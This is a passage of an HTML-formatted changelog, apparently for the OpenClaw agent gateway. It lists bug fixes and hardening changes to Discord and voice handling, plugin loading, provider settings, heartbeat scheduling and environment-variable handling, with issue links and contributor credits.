<p>Discord: retry outbound API calls on HTTP 5xx, request-timeout, and transient transport failures instead of only Discord rate limits, reducing dropped cron and agent replies during short Discord or network outages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116577020" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52396" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52396/hovercard" href="https://github.com/openclaw/openclaw/issues/52396">#52396</a>. Thanks @sunshineo.</p>
</li>
<li>
<p>Discord: include Components v2 Text Display content from referenced replies and forwarded snapshots, so component-only messages still appear in reply context. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158079453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56228" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56228/hovercard" href="https://github.com/openclaw/openclaw/issues/56228">#56228</a>. Thanks @HollandDrive.</p>
</li>
<li>
<p>Discord: add configurable gateway READY timeouts for startup and runtime reconnects, so staggered multi-account setups can avoid false restart loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331372526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72273" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72273/hovercard" href="https://github.com/openclaw/openclaw/issues/72273">#72273</a>. Thanks @sergionsantos.</p>
</li>
<li>
<p>Discord: preserve native slash-command description localizations through command reconcile, so localized Discord descriptions no longer get overwritten by English defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161405333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56580" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56580/hovercard" href="https://github.com/openclaw/openclaw/issues/56580">#56580</a>. Thanks @mhseo93.</p>
</li>
<li>
<p>Discord: add configured outbound mention aliases so known <code>@Name</code> references can be rewritten to real Discord user mentions instead of relying only on the transient directory cache. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274166014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67587" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67587/hovercard" href="https://github.com/openclaw/openclaw/issues/67587">#67587</a>. Thanks @McoreD.</p>
</li>
<li>
<p>Discord: avoid startup REST amplification by skipping native command deploy retries after Discord rate limits and deriving the bot id from parseable bot tokens instead of requiring a <code>/users/@me</code> lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362306201" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75341" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75341/hovercard" href="https://github.com/openclaw/openclaw/issues/75341">#75341</a>. Thanks @PrinceOfEgypt.</p>
</li>
<li>
<p>Plugins/hooks: derive hook <code>ctx.channelId</code> from the conversation target instead of the provider name, so Discord and other channel plugins can keep per-channel state isolated. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4196584916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59881" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59881/hovercard" href="https://github.com/openclaw/openclaw/issues/59881">#59881</a>. Thanks @bradfreels.</p>
</li>
<li>
<p>Gateway/config: log config health-state write failures instead of silently hiding config observe-recovery write errors. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</p>
</li>
<li>
<p>Diagnostics: reset stuck-session timers on reply, tool, status, block, and ACP progress events, and back off repeated <code>session.stuck</code> diagnostics while a session remains unchanged. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330206713" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72010" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72010/hovercard" href="https://github.com/openclaw/openclaw/pull/72010">#72010</a>. Thanks @rubencu.</p>
</li>
<li>
<p>Gateway/agents: avoid rebuilding core tools for plugin-only allowlists and keep the full plugin registry cache warm across scoped plugin loads, reducing per-turn latency spikes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367404227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75882" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75882/hovercard" href="https://github.com/openclaw/openclaw/issues/75882">#75882</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367580317" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75907" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75907/hovercard" href="https://github.com/openclaw/openclaw/issues/75907">#75907</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367573379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75906" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75906/hovercard" href="https://github.com/openclaw/openclaw/issues/75906">#75906</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367498934" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75887" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75887/hovercard" href="https://github.com/openclaw/openclaw/issues/75887">#75887</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367081946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75851" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75851/hovercard" href="https://github.com/openclaw/openclaw/issues/75851">#75851</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367733132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75922" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75922/hovercard" href="https://github.com/openclaw/openclaw/pull/75922">#75922</a>) Thanks @obviyus.</p>
</li>
<li>
<p>Agents/failover: classify bare <code>status: internal server error</code> provider messages as retryable server errors so model fallback can rotate instead of stopping. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346697764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73844" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73844/hovercard" href="https://github.com/openclaw/openclaw/pull/73844">#73844</a>) Thanks @thesomewhatyou.</p>
</li>
<li>
<p>Gateway/startup: return the shared retryable startup-sidecars error for startup-gated control-plane RPCs such as sessions.create, sessions.send, sessions.abort, agent.wait, and tools.effective, so clients can retry early sidecar races. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368487370" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76012" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76012/hovercard" href="https://github.com/openclaw/openclaw/pull/76012">#76012</a>) Thanks @scoootscooob.</p>
</li>
<li>
<p>Providers/Google: fix Gemini 2.5 Flash-Lite <code>reasoning: "minimal"</code> rejections by raising its thinking-budget floor to 512 while preserving the existing Gemini 2.5 Pro and Flash minimal presets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316577583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70629" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70629/hovercard" href="https://github.com/openclaw/openclaw/pull/70629">#70629</a>) Thanks @ericberic.</p>
</li>
<li>
<p>Agents/status: resolve <code>session_status(sessionKey="current")</code> for sparse channel-plugin sessions after literal current lookups miss, so Scope, Slack, Discord, and other plugin-driven agents avoid retrying through <code>Unknown sessionKey: current</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348384116" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74141" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74141/hovercard" href="https://github.com/openclaw/openclaw/issues/74141">#74141</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331560781" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72306" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72306/hovercard" href="https://github.com/openclaw/openclaw/pull/72306">#72306</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>.</p>
</li>
<li>
<p>Cron: retry recurring wake-now main-session jobs through temporary heartbeat busy skips before recording success, so queued cron events no longer appear as ok ghost runs while the main lane is still busy. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368042745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75964" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75964/hovercard" href="https://github.com/openclaw/openclaw/issues/75964">#75964</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369011338" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76083" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76083/hovercard" href="https://github.com/openclaw/openclaw/pull/76083">#76083</a>) Thanks @kshetrajna12 and @xuruiray.</p>
</li>
<li>
<p>Providers/Google: keep Gemini thinking-signature-only stream chunks active during reasoning, so Gemini 3.1 Pro Preview replies no longer hit idle timeouts before visible text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368880968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76071" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76071/hovercard" href="https://github.com/openclaw/openclaw/issues/76071">#76071</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368997122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76080" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76080/hovercard" href="https://github.com/openclaw/openclaw/pull/76080">#76080</a>) Thanks @marcoschierhorn and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</p>
</li>
<li>
<p>CLI/skills: show per-agent model and command visibility in <code>openclaw skills check --agent</code>, and let doctor report or disable unavailable skills allowed for the default agent. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368251753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75983" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75983/hovercard" href="https://github.com/openclaw/openclaw/pull/75983">#75983</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</p>
</li>
<li>
<p>Agents/tools: skip unavailable media generation and PDF tool factories from the live reply path when Gateway metadata and the active auth store prove no configured provider can back them, while keeping explicit config and auth-backed providers on the normal factory path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: reuse the Gateway metadata startup plan when ensuring reply runtime plugins are loaded, so live agent turns do not broad-load plugin runtimes after the Gateway already scoped startup activation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: delegate scoped reply runtime registry reuse to the plugin loader cache-key compatibility checks, so config changes with the same startup plugin ids cannot keep stale runtime hooks or tools active. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: let compatible wider plugin registries satisfy scoped reply runtime requests when they already contain the requested plugins, avoiding redundant runtime loading without bypassing loader cache-key freshness checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: validate agent model allowlists against manifest model catalog metadata during reply startup, avoiding broad provider runtime catalog loading before the agent run lane starts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: keep allowlisted configured model thinking metadata available when manifest catalog rows are absent, so explicit high-reasoning levels remain valid for custom configured models. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: preserve plugin-declared config-only generation providers such as local Comfy workflows during reply tool pre-gating, and share manifest auth/config availability checks between the planner and final tool factories. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: keep Comfy generation tools visible from legacy local workflow config and cloud API-key config when no Gateway metadata snapshot is active, using plugin-declared manifest signals instead of loading provider runtimes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: route media and generation capability lookups through the Gateway plugin metadata snapshot during reply tool registration, avoiding repeated manifest registry reloads on the live reply path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: let plugins declare media generation auth aliases and base-url guards in manifests, preserving OpenAI Codex OAuth image generation availability without core-owned provider special cases. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: reuse the auth profile store already loaded for the active run when deciding media and generation tool availability, avoiding repeated provider-auth runtime discovery during reply startup. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: keep image, video, and music generation tool registration on manifest/auth control-plane checks instead of loading runtime provider registries during reply startup, reducing live-path tool-prep blocking while leaving provider runtime resolution for execution and list actions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Discord: document canonical mention formatting in agent prompt hints and channel docs so outbound replies use <code>&lt;@USER_ID&gt;</code>, <code>&lt;#CHANNEL_ID&gt;</code>, and <code>&lt;@&amp;ROLE_ID&gt;</code> instead of legacy nickname mentions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359907332" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75173/hovercard" href="https://github.com/openclaw/openclaw/pull/75173">#75173</a>)</p>
</li>
<li>
<p>Heartbeat scheduler: gate exec-event/notification/spawn/retry wakes through a centralized cooldown so backgrounded <code>process.start</code> exit notifications can no longer self-feed runaway heartbeat runs (configured <code>every: "30m"</code> was firing every ~10s in production, pegging the gateway event loop with <code>eventLoopDelayMaxMs &gt;6s</code> spikes that stalled control-UI asset serving and TUI handshakes). Documented wake-now paths (<code>manual</code>, <code>wake</code>, task completion, blocked-task follow-up, <code>/hooks/wake mode=now</code>, and cron <code>--wake now</code>) remain immediate; retryable busy skips no longer poison the cooldown for the next retry; per-agent flood guard caps any unexpected feedback loop at 5 runs/60s. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4236016269" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64016" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64016/hovercard" href="https://github.com/openclaw/openclaw/issues/64016">#64016</a>, refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3946045245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/17797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/17797/hovercard" href="https://github.com/openclaw/openclaw/issues/17797">#17797</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362911805" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75436" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75436/hovercard" href="https://github.com/openclaw/openclaw/issues/75436">#75436</a>) Thanks @hexsprite.</p>
</li>
<li>
<p>fix: block workspace CLOUDSDK_PYTHON override and always set trusted interpreter for gcloud. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352375218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74492" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74492/hovercard" href="https://github.com/openclaw/openclaw/pull/74492">#74492</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>Providers/Z.AI: move the bundled GLM catalog and auth env metadata into the plugin manifest, so <code>models list --all --provider zai</code> shows the full known catalog without duplicated runtime seed data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Providers/Qianfan and Providers/Stepfun: declare setup auth metadata (<code>api-key</code> method, <code>QIANFAN_API_KEY</code>, <code>STEPFUN_API_KEY</code>) in the plugin manifest so onboarding and <code>models setup</code> surface the expected env var without falling back to legacy <code>providerAuthEnvVars</code> runtime seed data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>fix(infra): block ambient Homebrew env vars from brew resolution. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351948564" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74463" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74463/hovercard" href="https://github.com/openclaw/openclaw/pull/74463">#74463</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>Onboarding/configure: avoid staging every default plugin runtime dependency after config writes, so skipped setup flows only prepare config-selected plugin deps instead of pulling broad feature-plugin packages. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Thinking/providers: resolve bundled provider thinking profiles through lightweight provider policy artifacts when startup-lazy providers are not active, so OpenAI Codex GPT-5.x keeps xhigh available in Gateway session validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355122984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74796" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74796/hovercard" href="https://github.com/openclaw/openclaw/issues/74796">#74796</a>. Thanks @maxschachere.</p>
</li>
<li>
<p>Security/Windows: ignore workspace <code>.env</code> system-path variables and resolve stale-process <code>taskkill.exe</code> from the validated Windows install root, preventing repository-local env files from redirecting cleanup helpers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>CLI/plugins: refresh persisted plugin registry policy in place for <code>plugins enable</code> and <code>plugins disable</code>, so routine toggles no longer rebuild and hash every plugin source when the target is already indexed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Windows/install: run npm from a writable installer temp directory and pin the Bedrock runtime dependency below a Windows ARM Node 24 npm resolver failure, so global OpenClaw installs no longer fail before onboarding. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>CLI/plugins: scope install and enable slot selection to the selected plugin manifest/runtime fallback, so plugin installs no longer load every plugin runtime or broad status snapshot just to update memory/context slots. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/TTS: keep bundled speech-provider discovery available on cold package Gateway paths and add bundled plugin matrix runtime probes for health, readiness, RPC, TTS discovery, and post-ready runtime-deps watchdog coverage. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Google Meet/Twilio: show delegated voice call ID, DTMF, and intro-greeting state in <code>googlemeet doctor</code>, and avoid claiming DTMF was sent when no Meet PIN sequence was configured. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Plugins/tools: prefer built bundled plugin code during tool discovery and skip channel runtime hydration while preserving companion provider registrations, reducing per-run plugin-tool prep cost without dropping executable plugin tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361658522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75290" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75290/hovercard" href="https://github.com/openclaw/openclaw/issues/75290">#75290</a>. Thanks @thanos-openclaw.</p>
</li>
<li>
<p>Plugins/loader: scope plugin-tool registry reuse to the enabled plugin plan and stored Gateway method keys, so embedded runner tool lookup can reuse compatible startup registries without hiding enabled non-startup plugin tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363466995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75520" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75520/hovercard" href="https://github.com/openclaw/openclaw/issues/75520">#75520</a>. Thanks @whtoo.</p>
</li>
<li>
<p>Voice Call/Twilio: send notify-mode initial TwiML directly in the outbound create-call request while keeping conversation and pre-connect DTMF calls webhook-driven, so one-shot notify calls do not depend on a first-answer webhook fetch. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335052780" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72758" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72758/hovercard" href="https://github.com/openclaw/openclaw/pull/72758">#72758</a>. Thanks @tyshepps.</p>
</li>
<li>
<p>Discord/Slack: defer status-reaction cleanup until run finalization so queued, thinking, tool, and terminal reactions no longer flicker during normal progress updates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363934911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75582" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75582/hovercard" href="https://github.com/openclaw/openclaw/pull/75582">#75582</a>)</p>
</li>
<li>
<p>Discord/voice: leave Discord voice off for text-only configs unless <code>channels.discord.voice</code> is explicitly configured, avoiding default <code>GuildVoiceStates</code> traffic and idle gateway CPU pressure for bots that do not use <code>/vc</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345485387" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73753/hovercard" href="https://github.com/openclaw/openclaw/issues/73753">#73753</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347706250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74044" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74044/hovercard" href="https://github.com/openclaw/openclaw/issues/74044">#74044</a>. Thanks @sanchezm86 and @SecureCloudProjO.</p>
</li>
<li>
<p>Discord/voice: rerun configured voice auto-join after Discord gateway RESUMED events and ignore already-destroyed stale voice connections during reconnect cleanup, so health-monitor account restarts can rejoin configured channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4043554548" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40665" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40665/hovercard" href="https://github.com/openclaw/openclaw/issues/40665">#40665</a>. Thanks @liz709.</p>
</li>
<li>
<p>Plugins/CLI: reuse the cold manifest registry while building plugin status and inspect reports, so large configured plugin sets no longer rediscover the bundled/plugin registry once per inspect row. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/voice: lengthen the default voice join Ready wait, add configurable <code>voice.connectTimeoutMs</code>/<code>voice.reconnectGraceMs</code>, and warn before destroying unrecovered disconnected sessions so slow Discord voice handshakes and reconnects no longer fail silently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223830724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63098" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63098/hovercard" href="https://github.com/openclaw/openclaw/issues/63098">#63098</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041199935" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39825" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39825/hovercard" href="https://github.com/openclaw/openclaw/issues/39825">#39825</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245973986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65039" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65039/hovercard" href="https://github.com/openclaw/openclaw/issues/65039">#65039</a>. Thanks @darealgege, @kzicherman, and @ayochim.</p>
</li>
<li>
<p>Gateway/health: refresh cached health RPC snapshots when channel runtime state diverges, so Discord and other channel status reads no longer report stale running or connected values until the cache TTL expires. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362790644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75423" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75423/hovercard" href="https://github.com/openclaw/openclaw/pull/75423">#75423</a>)</p>
</li>
<li>
